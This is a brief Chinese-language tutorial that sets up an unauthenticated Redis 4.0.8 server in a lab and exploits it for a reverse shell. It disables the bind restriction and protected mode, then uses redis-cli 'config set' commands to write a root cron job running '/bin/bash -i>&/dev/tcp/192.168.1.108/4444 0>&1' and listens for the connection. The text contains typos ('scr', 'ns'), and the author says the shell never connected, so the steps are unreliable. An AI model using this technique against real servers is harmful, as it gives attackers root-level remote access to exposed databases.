redis未授权访问反弹shell
一、redis的安装
1.使用wget命令获取redis的安装包
wget http://download.redis.io/releases/redis-4.0.8.tar.gz
2.tar –zxvf redis-4.0.8.tar.gz
解压改文件
然后进入redis-4.0.8这个文件夹 cd redis-4.0.8
然后执行make命令
由于我们刚刚安装好redis数据库,还未创建用户,默认使用的是6379端口,没有密码,这个时候会导致未授权访问
3.安装完redis之后我们要更改一下配置文件 redis.conf 默认配置是只允许127.0.0.1本机回环地址连接redis数据库。
下面操作的意思是允许公网上的其他计算机访问redis数据库
先将redis.conf配置文件复制到当前目录下的src文件夹
cp redis.conf ./scr/redis.conf
在其中修改
bind 127.0.0.1 前面加上#注释符
protected-mode 设为no
daemonize no
保存退出
启动redis-server
./src/redis-server redis.conf
4.我们使用kali系统作为攻击人连接redis数据库
本次测试使用kali IP:192.168.1.108
Centos IP:192.168.1.107
redis-cli -h 192.168.1.107 -p 6379
"\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.1.108/4444 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save
然后使用ns命令监听本机4444端口
ns -l 4444
讲道理应该能连上的,但是没连上,问题后续解决,步骤应该没问题。。。